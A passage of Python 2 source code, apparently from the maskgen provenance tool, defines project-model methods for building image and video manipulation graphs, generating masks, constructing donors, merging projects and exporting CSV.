suffix_lower = suffix.lower()
totalSet.extend([filename for filename in os.listdir(dir) if
filename.lower().endswith(suffix_lower ) and \
not filename.endswith('_mask' + suffix) and \
not filename.endswith('_proxy' + suffix)])
totalSet = sorted(totalSet, key=sortalg)
added = []
for filename in totalSet:
try:
pathname = os.path.abspath(os.path.join(dir, filename))
additional = self.getAddTool(pathname).getAdditionalMetaData(pathname)
additional.update(preferences)
nname = self.G.add_node(pathname, xpos=xpos, ypos=ypos, nodetype='base', **additional)
added.append(nname)
ypos += 50
if ypos == 450:
ypos = initialYpos
xpos += 50
if filename == baseImageFileName:
self.start = nname
self.end = None
except Exception as ex:
logging.getLogger('maskgen').warn('Failed to add media file {}'.format(filename))
self.notify(added, 'add')
def addImage(self, pathname, cgi=False, prnu=False, **kwargs):
maxx = 50
max_node = None
for node_id in self.G.get_nodes():
node = self.G.get_node(node_id)
if 'xpos' in node and int(node['xpos']) > maxx:
maxx = int(node['xpos'])
max_node = node
maxy = max_node['ypos'] + 50 if max_node is not None else 50
additional = self.getAddTool(pathname).getAdditionalMetaData(pathname)
additional.update(kwargs)
nname = self.G.add_node(pathname, nodetype='base',
cgi='yes' if cgi else 'no',
xpos=maxx,
ypos=maxy,
prnu='yes' if prnu else 'no',
**additional)
self.start = nname
self.end = None
self.notify([self.start], 'add')
return nname
def getEdgesBySemanticGroup(self):
"""
:return: association of semantics groups to edge id tuples (start,end)
@rtype: dict of list of tuple
"""
result = {}
for edgeid in self.getGraph().get_edges():
for grp in self.getSemanticGroups(edgeid[0], edgeid[1]):
if grp not in result:
result[grp] = [edgeid]
else:
result[grp].append(edgeid)
return result
def add_to_edge(self, **items):
self.G.update_edge(self.start, self.end, **items)
self.notify((self.start, self.end), 'update_edge')
def update_node(self, node_properties):
deleteImage(self.getStartImageFile())
self.G.update_node(self.start, **node_properties)
def update_edge(self, mod):
"""
:param mod:
:return:
@type mod: Modification
"""
op = self.gopLoader.getOperationWithGroups(mod.operationName,fake=True)
mod_old = self.getModificationForEdge(self.start, self.end)
trigger_update = False
for k,v in mod.arguments.iteritems():
if (k not in mod_old.arguments or mod_old.arguments[k] != v) and \
k in op.getTriggerUpdateArguments():
trigger_update = True
for k in mod_old.arguments:
if k not in mod.arguments and \
k in op.getTriggerUpdateArguments():
trigger_update = True
self.G.update_edge(self.start, self.end,
op=mod.operationName,
description=mod.additionalInfo,
arguments={k: v for k, v in mod.arguments.iteritems() if k != 'inputmaskname'},
recordMaskInComposite=mod.recordMaskInComposite,
semanticGroups=mod.semanticGroups,
editable='no' if (
mod.software is not None and mod.software.internal) or mod.operationName == 'Donor' else 'yes',
softwareName=('' if mod.software is None else mod.software.name),
softwareVersion=('' if mod.software is None else mod.software.version),
inputmaskname=mod.inputMaskName)
self._save_group(mod.operationName)
if trigger_update:
self.reproduceMask(force=False)
else:
self.notify((self.start, self.end), 'update_edge')
def compare(self, destination, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask and the analysis results (a dictionary)
"""
return self.getLinkTool(self.start, destination).compare(self.start, destination, self, arguments=arguments)
def getMetaDiff(self):
""" Return the EXIF differences between nodes referenced by 'start' and 'end'
Return the Frame meta-data differences between nodes referenced by 'start' and 'end'
"""
e = self.G.get_edge(self.start, self.end)
if e is None:
return None
videodiff = VideoMetaDiff(e['metadatadiff']) if getValue(e,'metadatadiff',None) is not None else None
imagediff = MetaDiff(e['exifdiff']) if 'exifdiff' in e and len(e['exifdiff']) > 0 else None
return imagediff if imagediff is not None else videodiff
def getDonorAndBaseNodeTuples(self):
"""
Return a tuple (edge, base node, list of nodes that for the path from edge to base)
for each valid donor path through the graph
"""
donorEdges = []
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if graph_rules.eligible_for_donor(edge):
donorEdges.append(edge_id)
results = []
for edge in donorEdges:
baseSet = self._findBaseNodesAndPaths(edge[0], excludeDonor=True)
for base in baseSet:
if (edge, base) not in results:
results.append((edge, base[0], base[1]))
if len(baseSet) == 0:
results.append((edge, None, list()))
for result in results:
result[2].reverse()
return results
def getTerminalAndBaseNodeTuples(self):
"""
Return a tuple (lead node, base node) for each valid (non-donor) path through the graph
"""
terminalNodes = [node for node in self.G.get_nodes() if
len(self.G.successors(node)) == 0 and len(self.G.predecessors(node)) > 0]
return [(node, self._findBaseNodes(node)) for node in terminalNodes]
def getEdges(self, endNode,excludeDonor=True):
"""
:param endNode: (identifier)
:return: tuple (start, end, edge map) for all edges ending in endNode
"""
return self._findEdgesWithCycleDetection(endNode, excludeDonor=excludeDonor, visitSet=list())
def getNodeNames(self):
return self.G.get_nodes()
def getCurrentNode(self):
return self.G.get_node(self.start)
def isEditableEdge(self, start, end):
e = self.G.get_edge(start, end)
return 'editable' not in e or e['editable'] == 'yes'
def findChild(self, parent, child):
for suc in self.G.successors(parent):
if suc == child or self.findChild(suc, child):
return True
return False
def compress(self, all=False,force=False):
if all:
return [self._compress(node) for node in self.G.get_nodes()]
else:
return self._compress(self.start, force=force)
def _compress(self, start, force=False):
defaults = {'compressor.video': 'maskgen.video_tools.x264',
'compressor.audio': None,
'compressor.image': None}
node = self.G.get_node(start)
ftype = self.getNodeFileType(start)
# cannot finish the action since the edge analysis was skipped
for skipped_edge in self.G.getDataItem('skipped_edges', []):
if skipped_edge['start'] == start and not force:
return
if (len(self.G.successors(start)) == 0 or len(self.G.predecessors(start)) == 0) and not force:
return
props = {'remove_video': False,'force': False}
#for pred in self.G.predecessors(start):
# edge = self.G.get_edge(pred, start)
# op = getOperationWithGroups(edge['op'], fake=True)
# if op.category == 'Audio':
# props['remove_video'] = True
compressor = prefLoader.get_key('compressor.' + ftype,
default_value=defaults['compressor.' + ftype])
if 'compressed' in node:
return
func = getRule(compressor)
newfile = None
if func is not None:
newfilename = func(os.path.join(self.get_dir(), node['file']), **props)
if newfilename is not None:
newfile = os.path.split(newfilename)[1]
self.G.update_node(start,file=newfile,compressed=compressor)
return newfile
def connect(self, destination, mod=Modification('Donor', '',category='Donor'), invert=False, sendNotifications=True,
skipDonorAnalysis=False):
""" Given a image node name, connect the new node to the end of the currently selected node.
Create the mask, inverting the mask if requested.
Send a notification to the register caller if requested.
Return an error message on failure, otherwise return None
"""
if self.start is None:
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Node node selected",
Module=''), False
elif not self.G.has_node(destination):
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Canvas out of state from model. Node Missing.",
Module=''), False
elif self.findChild(destination, self.start):
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Cannot connect to ancestor node",
Module=''), False
else:
for successor in self.G.successors(self.start):
if successor == destination:
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Cannot connect to the same node twice",
Module=''), False
return self._connectNextImage(destination,
mod,
invert=invert,
sendNotifications=sendNotifications,
skipDonorAnalysis=skipDonorAnalysis)
def getPredecessorNode(self):
if self.end is None:
for pred in self.G.predecessors(self.start):
edge = self.G.get_edge(pred, self.start)
if edge['op'] != 'Donor':
return pred
return self.start
def getBaseNode(self, node):
for pred in self.G.predecessors(node):
edge = self.G.get_edge(pred, node)
if edge['op'] != 'Donor':
return self.getBaseNode(pred)
return node
def getCreatingOperation(self, destination):
"""
:return: operation for the manipulation that created this destination and the start node
@rtype: (str,Operation)
"""
predecessors = self.G.predecessors(destination)
for pred in predecessors:
pred_edge = self.G.get_edge(pred, destination)
edge_op = self.gopLoader.getOperationWithGroups(pred_edge['op'])
if edge_op is not None and pred_edge['op'] != 'Donor':
return pred, edge_op
def getDonorAndBaseImage(self):
"""
Get the donor image and associated baseImage for the selected node.
"""
nodeName = self.start if self.end is None else self.end
# verify the node is a leaf node
endPointTuples = self.getDonorAndBaseNodeTuples()
for x in endPointTuples:
if nodeName == x[0][1]:
baseImage, _ = self.G.get_image(x[1])
donors = self.constructDonors()
for donortuple in donors:
if donortuple.base == x[1]:
if donortuple.media_type == 'video':
return video_tools.getSingleFrameFromMask(donortuple.mask_wrapper), baseImage
elif donortuple.media_type == 'audio':
return None, None
else:
return donortuple.mask_wrapper, baseImage
return None, None
def getTransformedMask(self):
"""
:return: list of CompositeImage
"""
composite_generator = mask_rules.prepareComposite((self.start, self.end),self.G, self.gopLoader, self.probeMaskMemory)
return composite_generator.constructComposites(checkEmptyMask=False)
def executeFinalNodeRules(self):
terminalNodes = [node for node in self.G.get_nodes() if
len(self.G.successors(node)) == 0 and len(self.G.predecessors(node)) > 0]
for node in terminalNodes:
graph_rules.setFinalNodeProperties(self, node)
def constructDonors(self):
"""
Construct donor images
Find all valid base node, leaf node tuples
:return computed donors in the form of tuples
(image node id donated to, base image node, ImageWrapper mask, filename)
@rtype list of DonorImage
"""
self._executeSkippedComparisons()
for edge_id in self.G.get_edges():
if self.start is not None and self.start != edge_id[1]:
continue
composite_generator = mask_rules.prepareComposite(edge_id, self.G, self.gopLoader, self.probeMaskMemory)
return composite_generator.constructDonors(saveImage=False)
return []
def invertInputMask(self):
"""
Temporary: Add missing input masks
:return:
"""
if self.start is not None and self.end is not None:
start_im = self.startImage()
edge = self.G.get_edge(self.start, self.end)
if edge is not None:
maskname= getValue(edge,'inputmaskname')
if maskname is not None:
mask = openImageMaskFile(self.get_dir(),maskname)
if mask is not None:
expected_shape = start_im.image_array.shape[0:2]
if expected_shape != mask.shape:
mask = cv2.resize(mask,tuple(reversed(expected_shape)))
mask = ImageWrapper(mask)
mask = mask.invert()
mask.save(os.path.join(self.get_dir(),maskname))
def fixInputMasks(self):
"""
Temporary: Add missing input masks
:return:
"""
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if graph_rules.missing_donor_inputmask(edge, self.G.dir):
startimage, name = self.G.get_image(edge_id[0])
finalimage, fname = self.G.get_image(edge_id[1])
mask = self.G.get_edge_image(edge_id[0], edge_id[1], 'maskname')
inputmaskname = os.path.splitext(name)[0]+ '_inputmask.png'
ImageWrapper(composeCloneMask(mask, startimage, finalimage)).save(inputmaskname)
# if 'arguments' not in edge:
# edge['arguments'] = {}
edge['inputmaskname'] = os.path.split(inputmaskname)[1]
# edge['arguments']['inputmaskname'] = os.path.split(inputmaskname)[1]
self.G.setDataItem('autopastecloneinputmask', 'yes')
def renametobase(self):
"""
Rename the project to match the name of the base image
:return:
"""
for nodeid in self.G.get_nodes():
node = self.G.get_node(nodeid)
if 'nodetype' in node and node['nodetype'] == 'base':
pos = node['file'].find('.')
self.getGraph().set_name(node['file'][:pos] if pos > 0 else node['file'])
break
def addNextImage(self, pathname, invert=False, mod=Modification('', ''), sendNotifications=True, position=(50, 50),
skipRules=False, edge_parameters={}, node_parameters={}):
""" Given a image file name and PIL Image, add the image to the project, copying into the project directory if necessary.
Connect the new image node to the end of the currently selected edge. A node is selected, not an edge, then connect
to the currently selected node. Create the mask, inverting the mask if requested.
Send a notification to the register caller if requested.
Return a list of validation messages on failure, otherwise return None
"""
if (self.end is not None):
self.start = self.end
params = dict(node_parameters)
params['xpos'] = position[0]
params['ypos'] = position[1]
params['nodetype'] = 'base'
for k, v in self.getAddTool(pathname).getAdditionalMetaData(pathname).iteritems():
params[k] = v
destination = self.G.add_node(pathname, seriesname=self.getSeriesName(), **params)
self.notify([destination],'add')
analysis_params = dict({ k:v for k,v in edge_parameters.iteritems() if v is not None})
msgs, status = self._connectNextImage(destination, mod, invert=invert, sendNotifications=sendNotifications,
skipRules=skipRules, analysis_params=analysis_params)
return msgs, status
def getLinkType(self, start, end):
return self.getNodeFileType(start) + '.' + self.getNodeFileType(end)
def getLinkTool(self, start, end):
"""
:param start:
:param end:
:return:
@rtype: LinkTool
"""
return linkTools[self.getLinkType(start, end)]
def mergeProject(self, project):
"""
Merge projects. Does not support updating edges or nodes.
Instead, it only adds new edges and nodes.
Should be used with caution.
:param project:
:return:
@type project: ImageProjectModel
"""
# link from their node id to my node id
merge_point = dict()
myfiles = dict()
matches = dict()
for nodeid in self.getGraph().get_nodes():
mynode = self.getGraph().get_node(nodeid)
md5 = md5_of_file(os.path.join(self.G.dir, mynode['file']),
raiseError=False)
matches[md5] = nodeid
self.G.update_node(nodeid, file=md5)
for nodeid in project.getGraph().get_nodes():
theirnode = project.getGraph().get_node(nodeid)
theirfilemd5 = md5_of_file(os.path.join(project.get_dir(), theirnode['file']),
raiseError=False)
if theirnode['file'] in myfiles:
if myfiles[theirnode['file']] != theirfilemd5:
logging.getLogger('maskgen').warn(
'file {} is in both projects but MD5 is different'.format(theirnode['file']))
if theirfilemd5 in matches:
merge_point[nodeid] = matches[theirfilemd5]
if len(merge_point) == 0:
return 'No merge points found'
for nodeid in project.getGraph().get_nodes():
theirnode = project.getGraph().get_node(nodeid)
if nodeid not in merge_point:
merge_point[nodeid] = self.getGraph().add_node(os.path.join(project.get_dir(), theirnode['file']),
**theirnode)
for start, end in project.getGraph().get_edges():
mystart = merge_point[start]
myend = merge_point[end]
edge = self.getGraph().get_edge(mystart, myend)
if edge is None:
self.getGraph().copy_edge(mystart,
myend,
dir=project.get_dir(),
edge=project.getGraph().get_edge(start, end))
def getAddTool(self, media):
""""
:param media:
:return:
@rtype : AddTool
"""
ft = fileType(media)
if ft.startswith('zip'):
ft = 'zip'
return addTools[ft]
def hasSkippedEdges(self):
return len(self.G.getDataItem('skipped_edges', [])) > 0
def _executeQueue(self,q,results,tracker):
from Queue import Empty
"""
:param q:
:return:
@type q : Queue
@type failures: Queue
"""
while not q.empty():
try:
edge_data = q.get_nowait()
if edge_data is None:
break
logging.getLogger('maskgen').info('Recomputing mask for edge {} to {} using operation {}'.format(
edge_data['start'],
edge_data['end'],
edge_data['opName']
))
tracker.next('{}->{}'.format(edge_data['start'], edge_data['end']))
if self.getGraph().has_node(edge_data['start']) and self.getGraph().has_node(edge_data['end']) and \
self.getGraph().has_edge(edge_data['start'],edge_data['end']):
mask, analysis, errors = self.getLinkTool(edge_data['start'], edge_data['end']).compareImages(
edge_data['start'],
edge_data['end'],
self,
edge_data['opName'],
arguments=edge_data['arguments'],
skipDonorAnalysis=edge_data['skipDonorAnalysis'],
invert=edge_data['invert'],
analysis_params=edge_data['analysis_params'])
maskname = shortenName(edge_data['start'] + '_' + edge_data['end'], '_mask.png', identifier=self.G.nextId())
self.G.update_mask(edge_data['start'], edge_data['end'], mask=mask, maskname=maskname, errors=errors,
**consolidate(analysis, edge_data['analysis_params']))
else:
errors = []
results.put(((edge_data['start'], edge_data['end']), True, errors))
#with self.G.lock:
# results.put(((edge_data['start'], edge_data['end']), True, errors))
# self.G.setDataItem('skipped_edges', [skip_data for skip_data in self.G.getDataItem('skipped_edges', []) if
# (skip_data['start'], skip_data['end']) != (edge_data['start'], edge_data['end'])])
except Empty:
break
except Exception as e:
if edge_data is not None:
logging.getLogger('maskgen').error('Failure to generate mask for edge {} to {} using operation {}: {}'.format(
edge_data['start'],
edge_data['end'],
edge_data['opName'],
str(e)
))
results.put(((edge_data['start'], edge_data['end']),False, [str(e)]))
return
def _executeSkippedComparisons(self,status_cb=None):
from Queue import Queue
from threading import Thread
allErrors = []
completed = []
q = Queue()
status = Queue()
results = Queue()
skipped_edges = self.G.getDataItem('skipped_edges', [])
if len(skipped_edges) == 0:
return
tracker_cb = status_cb
tracker_cb = lambda x : status.put(x) if tracker_cb is not None and int(skipped_threads) >= 2 else None
tracker = StatusTracker(module_name='Mask Generator',
amount=len(skipped_edges),
status_cb=tracker_cb)
for edge_data in skipped_edges:
q.put(edge_data)
skipped_threads = prefLoader.get_key('skipped_threads', 2)
logging.getLogger('maskgen').info('Recomputing {} masks with {} threads'.format(q.qsize(), skipped_threads))
threads = list()
try:
if int(skipped_threads) < 2:
self._executeQueue(q, results, tracker)
else:
for i in range(int(skipped_threads)):
t = Thread(target=self._executeQueue, name='skipped_edges' + str(i), args=(q,results,tracker))
threads.append(t)
t.start()
if status_cb is not None:
while not q.empty():
try:
message = status.get(timeout=5)
if message is not None:
status_cb(message)
except:
continue
for thread in threads:
thread.join()
while not results.empty():
result = results.get_nowait()
allErrors.extend(result[2])
if result[1]:
completed.append(result[0])
finally:
tracker.complete()
self.G.setDataItem('skipped_edges',[edge_data for edge_data in skipped_edges if (edge_data['start'], edge_data['end']) not in completed])
msg = os.linesep.join(allErrors).strip()
return msg if len(msg) > 0 else None
def _compareImages(self, start, destination, opName, invert=False, arguments={}, skipDonorAnalysis=False,
analysis_params=dict(),
force=False):
if prefLoader.get_key('skip_compare') and not force:
self.G.setDataItem('skipped_edges', self.G.getDataItem('skipped_edges', list()) + [{"start": start,
"end": destination,
"analysis_params": analysis_params,
"arguments": arguments,
"opName": opName,
"skipDonorAnalysis": skipDonorAnalysis,
"invert": invert
}])
return None, {}, []
try:
for k, v in self.gopLoader.getOperationWithGroups(opName).compareparameters.iteritems():
arguments[k] = v
except:
pass
return self.getLinkTool(start, destination).compareImages(start, destination, self, opName,
arguments=arguments,
skipDonorAnalysis=skipDonorAnalysis,
invert=invert,
analysis_params=analysis_params)
def reproduceMask(self, skipDonorAnalysis=False,edge_id=None, analysis_params=dict(), argument_params=dict(),
force=True):
"""
:param skipDonorAnalysis:
:param edge_id:
:param analysis_params:
:param argument_params:
:param force: If True, then force mask creation do not skip.
:return:
"""
errors = []
mask_edge_id = (self.start, self.end) if edge_id is None else edge_id
edge = self.G.get_edge(mask_edge_id[0],mask_edge_id[1])
arguments = dict(edge['arguments']) if 'arguments' in edge else dict()
if len(argument_params) > 0:
arguments = argument_params
if 'inputmaskname' in edge and edge['inputmaskname'] is not None:
arguments['inputmaskname'] = edge['inputmaskname']
try:
mask, analysis, errors = self._compareImages(mask_edge_id[0], mask_edge_id[1], edge['op'],
arguments=arguments,
skipDonorAnalysis=skipDonorAnalysis,
analysis_params=analysis_params,
force=force)
analysis_params['arguments'] = arguments
maskname = shortenName(mask_edge_id[0] + '_' + mask_edge_id[1], '_mask.png', identifier=self.G.nextId())
self.G.update_mask(mask_edge_id[0], mask_edge_id[1], mask=mask, maskname=maskname, errors=errors, **consolidate(analysis, analysis_params))
if len(errors) == 0:
self.G.setDataItem('skipped_edges', [skip_data for skip_data in self.G.getDataItem('skipped_edges', []) if
(skip_data['start'], skip_data['end']) != mask_edge_id])
self.notify(mask_edge_id, 'update_edge')
except video_tools.MaskGenerationError as e:
if e.message != '':
logging.getLogger('maskgen').info(e.message)
return errors
def _connectNextImage(self, destination, mod, invert=False, sendNotifications=True, skipRules=False,
skipDonorAnalysis=False,
analysis_params={}):
"""
:param destination:
:param mod:
:param invert:
:param sendNotifications:
:param skipRules:
:param skipDonorAnalysis:
:param analysis_params:
:return: Error message and success or failure
@rtype: (str, bool)
"""
try:
maskname = shortenName(self.start + '_' + destination, '_mask.png', identifier=self.G.nextId())
if mod.inputMaskName is not None:
mod.arguments['inputmaskname'] = mod.inputMaskName
mask, analysis, errors = self._compareImages(self.start, destination, mod.operationName,
invert=invert, arguments=mod.arguments,
skipDonorAnalysis=skipDonorAnalysis,
analysis_params=analysis_params)
self.end = destination
if errors:
mod.errors = errors
for k, v in analysis_params.iteritems():
if k not in analysis:
analysis[k] = v
if 'recordMaskInComposite' in mod.arguments:
mod.recordMaskInComposite = mod.arguments.pop('recordMaskInComposite')
mod.recordMaskInComposite = getValue(analysis,'global','yes') == 'no' | mod.recordMaskInComposite
self.__addEdge(self.start, self.end, mask, maskname, mod, analysis)
if sendNotifications:
self.notify((self.start, destination), 'connect')
logging.getLogger('maskgen').debug('Validation')
edgeErrors = [] if skipRules else self.validator.run_edge_rules(self.G, self.start, destination, isolated=True)
edgeErrors = edgeErrors if len(edgeErrors) > 0 else None
self.labelNodes(self.start)
self.labelNodes(destination)
return edgeErrors, True
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.getLogger('maskgen').error(' '.join(traceback.format_exception(exc_type,exc_value,exc_traceback)))
return [ValidationMessage(Severity.ERROR,
self.start,
destination,
'Exception (' + str(e) + ')',
'Change Mask',
None)], False
def __scan_args_callback(self, opName, arguments):
"""
Call back function for image graph's arg_checker_callback.
Add any discovered arguments that are associated with
file paths so that the image graph can managed the file
existence and archiving
:param opName:
:param arguments:
:return:
"""
if len(arguments) > 0 and opName != 'node':
self.__addEdgeFilePaths(self.gopLoader.getOperationWithGroups(opName, fake=True))
def __addEdgeFilePaths(self, op):
for k, v in op.mandatoryparameters.iteritems():
if k == 'inputmaskname':
continue
if v['type'].startswith('fileset:') or v['type'].startswith('file:'):
self.G.addEdgeFilePath('arguments.' + k, '')
for k, v in op.optionalparameters.iteritems():
if k == 'inputmaskname':
continue
if v['type'].startswith('fileset:') or v['type'].startswith('file:'):
self.G.addEdgeFilePath('arguments.' + k, '')
def __addEdge(self, start, end, mask, maskname, mod, additionalParameters):
if len(mod.arguments) > 0:
additionalParameters['arguments'] = {k: v for k, v in mod.arguments.iteritems() if k != 'inputmaskname'}
self.G.add_edge(start, end,
mask=mask,
maskname=maskname,
op=mod.operationName,
description=mod.additionalInfo,
recordMaskInComposite=mod.recordMaskInComposite,
editable='no' if (
mod.software is not None and mod.software.internal) or mod.operationName == 'Donor' else 'yes',
softwareName=('' if mod.software is None else mod.software.name),
softwareVersion=('' if mod.software is None else mod.software.version),
inputmaskname=mod.inputMaskName,
automated=mod.automated,
semanticGroups=mod.semanticGroups,
errors=mod.errors,
**additionalParameters)
self._save_group(mod.operationName)
def _save_group(self, operation_name):
op = self.gopLoader.getOperationWithGroups(operation_name, fake=True)
if op.groupedOperations is not None and len(op.groupedOperations) > 0:
groups = self.G.getDataItem('groups')
if groups is None:
groups = dict()
groups[operation_name] = op.groupedOperations
self.G.setDataItem('groups', groups, excludeUpdate=True)
def getSeriesName(self):
""" A Series is the prefix of the first image node """
if self.start is None:
return None
startNode = self.G.get_node(self.start)
prefix = None
if (startNode.has_key('seriesname')):
prefix = startNode['seriesname']
if (self.end is not None):
endNode = self.G.get_node(self.end)
if (endNode.has_key('seriesname')):
prefix = startNode['seriesname']
return prefix
def nodesToCSV(self, filename, additionalpaths=list(), nodeFilter=None):
"""
Create a CSV containing all the nodes of the graph.
By default, the first columns are project name, edge start node id,
edge end node id, and edge operation.
:param filename:
:param additionalpaths: paths that describe nested keys within the edge dictionary identifying
those keys' value to be placed as columns in the CSV
:param nodeFilter: a function that accepts the node dictionary and returns True if
the edge is to be included in the CSV file. If the edgeFilter is None or not provided,
all edges are included in the CSV file
:return: None
@type filename: str
@type edgeFilter: func
"""
import csv
csv.register_dialect('unixpwd', delimiter=',', quoting=csv.QUOTE_MINIMAL)
with open(filename, "ab") as fp:
fp_writer = csv.writer(fp)
for node_id in self.G.get_nodes():
node = self.G.get_node(node_id)
if nodeFilter is not None and not nodeFilter(node):
continue
row = [self.G.get_name(), node_id, node['nodetype'], self.G.getNodeFileType(node_id), self.G.get_filename(node_id)]
for path in additionalpaths:
if type(path) == 'str':
values = getPathValues(node, path)
else:
values = path(node)
if len(values) > 0:
row.append(values[0])
else:
row.append('')
fp_writer.writerow(row)
def toCSV(self, filename, additionalpaths=list(), edgeFilter=None):
"""
Create a CSV containing all the edges of the graph.
By default, the first columns are project name, edge start node id,
edge end node id, and edge operation.
:param filename:
:param additionalpaths: paths that describe nested keys within the edge dictionary identifying
those keys' value to be placed as columns in the CSV
:param edgeFilter: a function that accepts the edge dictionary and returns True if
the edge is to be included in the CSV file. If the edgeFilter is None or not provided,
all edges are included in the CSV file
:return: None
@type filename: str
@type edgeFilter: func
"""
import csv
import inspect
from functools import partial
csv.register_dialect('unixpwd', delimiter=',', quoting=csv.QUOTE_MINIMAL)
with open(filename, "ab") as fp:
fp_writer = csv.writer(fp)
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if edgeFilter is not None and not edgeFilter(edge):
continue
row = [self.G.get_name(), edge_id[0], edge_id[1], edge['op']]
baseNodes = self._findBaseNodes(edge_id[0])
for path in additionalpaths:
if path == 'basenode':
row.append(baseNodes[0])
continue
elif type(path) == 'str':
values = getPathValues(edge, path)
elif (inspect.isfunction(path) and 'graph' in inspect.getargspec(path).args) or \
(isinstance(path, partial) and 'graph' in inspect.getargspec(path.func).args):
values = path(edge, edge_id=edge_id, op=self.gopLoader.getOperationWithGroups(edge['op']),
graph=self.getGraph())
else:
values = path(edge, edge_id=edge_id, op=self.gopLoader.getOperationWithGroups(edge['op']))
if len(values) > 0:
row.append(values[0])
else:
row.append('')
fp_writer.writerow(row)
def getName(self):
return self.G.get_name()
def operationImageName(self):
return self.end if self.end is not None else self.start
def getFileName(self, nodeid):
return self.G.get_node(nodeid)['file']
def startImageName(self):
return self.G.get_node(self.start)['file'] if self.start is not None else ""
def nextImageName(self):
return self.G.get_node(self.end)['file'] if self.end is not None else ""
def nextId(self):
return self.end
def undo(self):
""" Undo the last graph edit """
s = self.start
e = self.end
self.start = None
self.end = None
self.G.undo()
self.notify((s, e), 'undo')
def select(self, edge):
if self.getGraph().get_node(edge[0]) == None:
return False
self.start = edge[0]
self.end = edge[1]
return True
def _openProject(self, projectFileName, projecttype, username=None,tool=None):
return createGraph(projectFileName,
projecttype=projecttype,
arg_checker_callback=self.__scan_args_callback,
edgeFilePaths={'inputmaskname': 'inputmaskownership',
'selectmasks.mask': '',
'videomasks.videosegment': '',
'substitute subsitute': '',
'substitute videomasks.videosegment': ''},
nodeFilePaths={'donors.*': ''},
username=username if username is not None else self.username,
tool=tool)
def _autocorrect(self):
if not updateJournal(self):
logging.getLogger('maskgen').error('Cannot auto update journal')
def _setup(self, projectFileName, graph=None, baseImageFileName=None,tool=None):
projecttype = None if baseImageFileName is None else fileType(baseImageFileName)
self.G = self._openProject(projectFileName, projecttype, username=self.username,tool=tool) if graph is None else graph
self._autocorrect()
self.start = None
self.end = None
n = self.G.get_nodes()
if len(n) > 0:
self.start = n[0]
s = self.G.successors(n[0])
if len(s) > 0:
self.end = s[0]
else:
p = self.G.predecessors(n[0])
if len(p) > 0:
self.start = p[0]
self.end = n[0]
# inject loaded groups into the group operations manager
for group, ops in self.G.getDataItem('groups', default_value={}).iteritems():
self.gopLoader.injectGroup(group, ops)
self.validator = Validator(prefLoader, self.gopLoader)
def getStartType(self):
return self.G.getNodeFileType(self.start) if self.start is not None else 'image'
def getEndType(self):
return self.G.getNodeFileType(self.end) if self.end is not None else 'image'
def getNodeFileType(self, nodeid):
return self.G.getNodeFileType(nodeid)
def saveas(self, pathname):
with self.lock:
self.clear_validation_properties()
self.assignColors()
self.G.saveas(pathname)
def save(self):
with self.lock:
self.clear_validation_properties()
self.assignColors()
self.setProjectSummary()
self.G.save()
def getEdgeItem(self, name, default=None):
edge = self.G.get_edge(self.start, self.end)
return edge[name] if name in edge else default
def getDescriptionForPredecessor(self, node):
for pred in self.G.predecessors(node):
edge = self.G.get_edge(pred, node)
if edge['op'] != 'Donor':
return self.getModificationForEdge(pred, node)
return None
def getCurrentEdgeModification(self):
if self.start is None or self.end is None:
return None
return self.getModificationForEdge(self.start, self.end)
def findPaths(self,node, condition):
"""
Return a list of a tuple. The first item is the full path in reverse order
from final node to current node. The second item is a boolean indicating if the path
meets the condition.
:param node:
:param condition:
:return:
@rtype: list of (list,bool)
"""
successors = self.G.successors(node)
if len(successors) == 0:
return [([node],False)]
else:
paths=[]
for successsor in successors:
for path in self.findPaths(successsor, condition):
paths.append(path)
paths = [(path[0]+[node], condition(node, path[0][-1]) | path[1]) for path in paths]
return paths
def findEdgePaths(self,node):
"""
Return a list of a tuple. The first item is the full path in reverse order
from final node to current node. The second item is a boolean indicating if the path
meets the condition.
:param node:
:param condition:
:return:
@rtype: list of (list,bool)
"""
successors = self.G.successors(node)
if len(successors) == 0:
return [[]]
else:
paths=[]
for successsor in successors:
for path in self.findEdgePaths(successsor):
paths.append(path)
paths = [path+[(node, successsor)] for path in paths]
return paths
def getImage(self, name):
if name is None or name == '':
return ImageWrapper(np.zeros((250, 250, 4)).astype('uint8'))
return self.G.get_image(name)[0]
def getImageAndName(self, name, arguments=dict()):
"""
:param name:
:param arguments:
:return:
@rtype (ImageWrapper,str)
"""
if name is None or name == '':
return ImageWrapper(np.zeros((250, 250, 4)).astype('uint8')),''
return self.G.get_image(name, metadata=arguments)
def getStartImageFile(self):
return os.path.join(self.G.dir, self.G.get_node(self.start)['file'])
def getProxy(self):
return getValue(self.G.get_node(self.start),'proxyfile')
def setProxy(self, filename):
if filename is None:
if self.getProxy() is not None:
self.G.get_node(self.start).pop('proxyfile')
return
self.G.update_node(self.start,proxyfile=os.path.basename(filename))
def getNextImageFile(self):
return os.path.join(self.G.dir, self.G.get_node(self.end)['file'])
def startImage(self):
return self.getImage(self.start)
def nextImage(self):
if self.end is None:
dim = (250, 250) if self.start is None else self.getImage(self.start).size
return ImageWrapper(np.zeros((dim[1], dim[0])).astype('uint8'))
return self.getImage(self.end)
def updateSelectMask(self, selectMasks):
if self.end is None:
return
sms = []
for k, v in selectMasks.iteritems():
if v is not None:
sms.append({'mask': v[0], 'node': k})
self.G.update_edge(self.start, self.end, selectmasks=sms)
def getSelectMasks(self):
"""
A selectMask is a mask the is used in composite mask production, overriding the default link mask
"""
if self.end is None:
return {}
edge = self.G.get_edge(self.start, self.end)
terminals = self._findTerminalNodes(self.end, excludeDonor=True,
includeOps=['Recapture', 'TransformWarp', 'TransformContentAwareScale',
'TransformDistort', 'TransformSkew', 'TransformSeamCarving'])
images = edge['selectmasks'] if 'selectmasks' in edge else []
sms = {}
for image in images:
if image['node'] in terminals:
sms[image['node']] = (
image['mask'], openImageFile(os.path.join(self.get_dir(), image['mask']), isMask=False))
for terminal in terminals:
if terminal not in sms:
sms[terminal] = None
return sms
def maskImageName(self):
if self.end is None:
return ''
edge = self.G.get_edge(self.start, self.end)
